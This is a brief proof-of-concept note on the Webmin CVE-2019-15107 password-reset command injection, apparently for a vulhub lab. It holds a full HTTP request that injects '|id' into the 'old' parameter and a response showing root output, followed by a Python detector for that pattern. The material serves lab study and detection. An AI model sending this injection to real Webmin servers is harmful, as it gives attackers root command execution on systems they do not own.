CVE-2019-15107 Webmin RCE <=1.920
1. Webmin <=1.920
2. The vulnerability requires the password reset feature to be enabled.
https://10.10.20.166:10000/password_change.cgi
PoC
Appending |ifconfig to the old parameter executes the command. (The command still executes even if the user does not exist.)
POST /password_change.cgi HTTP/1.1
Host: 10.10.20.166:10000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: redirect=1; testing=1; sid=x; sessiontest=1
Referer: https://10.10.20.166:10000/session_login.cgi
Content-Type: application/x-www-form-urlencoded
Content-Length: 60

user=rootxx&pam=&expired=2&old=test|id&new1=test2&new2=test2

<div class="panel-body">
<hr>
<center><h3>Failed to change password : The current password is incorrectuid=0(root) gid=0(root) groups=0(root)
</h3></center>
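
A detection sketch for the request and response shown above, as an added example that is not part of the original page: it flags POSTs to /password_change.cgi whose old field carries shell metacharacters, and responses where extra text follows the error message. The function names and the benign samples are constructed for illustration; matching metacharacters other than | is an added generalization.

```python
import re
from urllib.parse import parse_qs

ENDPOINT = "/password_change.cgi"
# '|' is the character used in the page's request; ';', '`' and '$(' are an
# added generalization (assumption), not taken from the page.
SHELL_META = re.compile(r"[|;`]|\$\(")
ERROR_TEXT = "The current password is incorrect"

def parse_request(raw):
    """Split a raw HTTP request into (method, path, decoded form fields)."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    method, target = head.split("\n", 1)[0].split(" ")[:2]
    fields = parse_qs(body.strip(), keep_blank_values=True)  # decodes %7C etc.
    return method, target.split("?", 1)[0], fields

def suspicious_old_values(raw):
    """Return 'old' values containing shell metacharacters (POST to ENDPOINT only)."""
    method, path, fields = parse_request(raw)
    if method != "POST" or path != ENDPOINT:
        return []
    return [v for v in fields.get("old", []) if SHELL_META.search(v)]

def response_has_trailing_output(body):
    """True when text follows the error message before the closing </h3>."""
    m = re.search(re.escape(ERROR_TEXT) + r"(.*?)</h3>", body, re.S)
    return bool(m and m.group(1).strip())

# Request and response reduced from the page; the benign variants are constructed.
PAGE_REQUEST = (
    "POST /password_change.cgi HTTP/1.1\r\n"
    "Host: 10.10.20.166:10000\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "user=rootxx&pam=&expired=2&old=test|id&new1=test2&new2=test2"
)
BENIGN_REQUEST = PAGE_REQUEST.replace("old=test|id", "old=Summer2019")
PAGE_RESPONSE = ("<center><h3>Failed to change password : The current password is "
                 "incorrectuid=0(root) gid=0(root) groups=0(root)\n</h3></center>")
BENIGN_RESPONSE = ("<center><h3>Failed to change password : "
                   "The current password is incorrect</h3></center>")

if __name__ == "__main__":
    for name, req in (("page", PAGE_REQUEST), ("benign", BENIGN_REQUEST)):
        print(name, "request ->", suspicious_old_values(req))
    for name, resp in (("page", PAGE_RESPONSE), ("benign", BENIGN_RESPONSE)):
        print(name, "response ->", response_has_trailing_output(resp))
```

Legitimate passwords can contain these characters, so treat a request hit as a lead for review and the response check as the stronger signal.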
Batch scripts can be obtained from GitHub.
Reference links:
https://github.com/vulhub/vulhub/tree/master/webmin/CVE-2019-15107
Last updated: 2023-10-12